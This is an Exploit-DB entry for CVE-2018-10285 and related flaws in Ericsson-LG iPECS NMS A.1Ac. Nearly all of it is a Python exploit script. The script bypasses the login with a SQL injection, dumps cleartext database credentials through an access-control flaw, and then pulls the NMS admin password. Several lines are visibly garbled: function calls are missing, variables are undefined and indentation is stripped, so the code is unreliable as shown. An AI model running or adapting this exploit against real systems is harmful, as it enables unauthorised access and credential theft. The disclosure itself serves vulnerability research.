Ericsson-LG iPECS NMS A.1Ac - Cleartext Credential Disclosure

EDB-ID: 44515
Author: Berk Cem Göksel
Published: 2018-04-24
CVE: CVE-2018-10285...
Type: Webapps
Platform: PHP
Aliases: N/A
Advisory/Source: N/A
Tags: SQL Injection (SQLi)
Vulnerable App: N/A


# Exploit Title: Ericsson-LG iPECS NMS - Cleartext Cred. Dump
# Vendor Notification: 03-03-2018 - No response
# Initial CVE: 04-04-2018
# Disclosure: 21-04-2018
# Exploit Author: Berk Cem Göksel
# Contact: ||
# Vendor Homepage:
# Version: A.1Ac and possibly earlier
# Tested on: Windows 2008 R2 x64
# CVE-2018-9245: Multiple SQL injections
# CVE-2018-10285: Incorrect access control
# CVE-2018-10286: Sensitive information disclosure

# The Ericsson-LG iPECS NMS version A.1Ac and possibly earlier disclose sensitive
# information such as cleartext database and NMS login credentials, use incorrect
# access control mechanisms, are vulnerable to MiTM attacks and are prone to
# SQL injection attacks on multiple parameters.
# This script dumps some sensitive information.
# Why use it?
# Normally, you can bypass the login through the SQLi but will get "kicked out".
# Thankfully, we can leverage this to extract the actual admin credentials for
# the web app. In order to do this, we must first dump the database
# credentials in cleartext.

# Usage = python IP_adress port
# Example = python 80

from sys import argv
import sys
import os
import time
import requests
import re

if len(argv) != 3:

print "The script takes two mandatory arguments."
print "\nExample usage: python 80"


#Log in through SQLi. Otherwise the next POST request is rejected.
sqli_path = "/nms/php/module/main/main_login.php"
sqli_url = "http://" + IP + ":" + port + sqli_path
sqli_cookies = {"mainTab_selectedChild": "sysinfoTab"}
sqli_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded"}
sqli_data={"id": "1", "passwd": "1' or 1=1--"}
r =, headers=sqli_headers, cookies=sqli_cookies, data=sqli_data)
print(r.status_code, r.reason)

#Thanks to incorrect access control we can
#dump cleartext database credentials
dump_path = "/nms/php/module/main/main_start.php"
dump_url = "http://" + IP + ":" + port + dump_path
nms_cookie = {"mainTab_selectedChild": "sysinfoTab"}
nms_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}
nms_data={"command": "nms_start", "client_id": "20"}
r2 =, headers=nms_headers, cookies=nms_cookie, data=nms_data)
print(r2.status_code, r2.reason)

db_cred_dump = r2.content

#Extract db user and db pass from the dump
m ="db_user:'(.*)'.*db_pwd:'([^']*)", db_cred_dump)

if m is not None:
postgre_db_user =
postgre_db_pwd =

print "Something went wrong parsing the credentials. Check the dump manually."

client_id = "2" #Doesn't really matter
user_id = "10" #Doesn't matter either
db_user = postgre_db_user # This does matter
db_pwd = postgre_db_pwd # So does this

#Use db user and password to extract admin credentials for the NMS
users_path = "/nms/php/module/init/module_init.php"
users_url = "http://" + IP + ":" + port + users_path
users_cookies = {"mainTab_selectedChild": "sysinfoTab"}
users_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}
users_data={"command": "init_configuration", "client_id": "2", "user_id": user_id, "db_user": db_user, "db_pwd": db_pwd, "mfimSeq": "0", "req_system_id": "0", "req_system_name": ''}
r3 =, headers=users_headers, cookies=users_cookies, data=users_data)

print(r3.status_code, r3.reason)

user_dump = r3.content

print "Done. You can log in to the postgresql database using the below credentials."
print "\ndb_user: " + postgre_db_user
print "db_pwd: " + postgre_db_pwd
print "\nAnd/Or you can log in to the NMS using the following credentials"
m1 ="userList:\[\[\d,'([^']*)','([^']*)", user_dump)

if m1 is not None:
nms_admin =
nms_pwd =
print "\ndb_admin: " + nms_admin
print "db_pwd: " + nms_pwd
print "\nDid not get nms_admin and nms_pwd. Check the dump manually."

dumpfile = open("ipecsnms_dump.txt","w")


print "\nRaw output written to ipecsnms_dump.txt for further username and group enumeration."
print "Have fun!"

Related Posts